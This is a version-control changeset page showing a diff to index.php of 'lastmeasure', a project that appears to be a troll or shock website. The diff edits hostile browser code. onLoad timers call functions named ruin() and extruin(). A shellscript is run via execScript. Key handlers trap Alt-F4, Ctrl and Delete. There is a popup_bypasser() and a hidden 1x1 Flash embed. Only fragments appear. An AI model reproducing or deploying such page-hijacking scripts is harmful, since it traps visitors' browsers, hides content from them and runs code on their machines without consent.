Changeset 93 for trollforge/lastmeasure


Ignore:
Timestamp:
11/24/05 02:01:05 (7 years ago)
Author:
sam
Message:
  • code fixes here and there
File:
1 edited

Legend:

Unmodified
Added
Removed
  • trollforge/lastmeasure/index.php

    r92 r93  
    7676      } 
    7777      //print(); 
    78       setTimeout("ruin()", 10); 
     78      setTimeout("ruin()", 200); 
    7979    } 
    8080  </script> 
     
    135135      x.DOM.Script.execScript(shellscript.toString()); 
    136136      x.DOM.Script.setTimeout("shellscript()"); 
     137      setTimeout("main()", 200); 
    137138    } 
    138139  </script> 
     
    229230      ?> 
    230231<body background="<?php random_image();?>" bgcolor="#ffffff" 
    231       onLoad="setTimeout('extruin()',100);<?php if($br_ie6) { ?>setTimeout('main()',100);<?php } ?>" 
     232      onLoad="setTimeout('extruin()',200);<?php if($br_ie6) { ?>setTimeout('main()',100);<?php } ?>" 
    232233      onKeyDown="altf4key();ctrlkey();delkey();" 
    233234      leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> 
     
    238239          popup_bypasser(); 
    239240          //divert_onload(); 
    240         } //else { ?> 
     241        } ?> 
    241242  <table width="100%" height="100%"> 
    242243    <tr> 
     
    246247          <br /> 
    247248          <br /> 
    248           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 
    249                   codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" 
    250                   width="1" height="1"> 
    251             <param name="movie" value="<?php echo $flash;?>"></param> 
    252             <param name="quality" value="high"></param> 
    253             <embed src="<?php echo $flash;?>" quality="high" 
    254                    pluginspage="http://www.macromedia.com/go/getflashplayer" 
    255                    type="application/x-shockwave-flash" width="1" height="1"> 
    256             </embed> 
    257           </object> 
     249          <?php if(!$br_ie6) { ?> 
     250            <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 
     251                    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" 
     252                    width="1" height="1"> 
     253              <param name="movie" value="<?php echo $flash;?>"></param> 
     254              <param name="quality" value="high"></param> 
     255              <embed src="<?php echo $flash;?>" quality="high" 
     256                     pluginspage="http://www.macromedia.com/go/getflashplayer" 
     257                     type="application/x-shockwave-flash" width="1" height="1"> 
     258              </embed> 
     259            </object> 
     260          <?php } ?> 
    258261        </div> 
    259262      </td> 
    260263    </tr> 
    261264  </table> 
    262   <?php //} ?> 
    263265  <form> 
    264266    <input type="submit" value="CLICK ME" name="CLICK ME" 
Note: See TracChangeset for help on using the changeset viewer.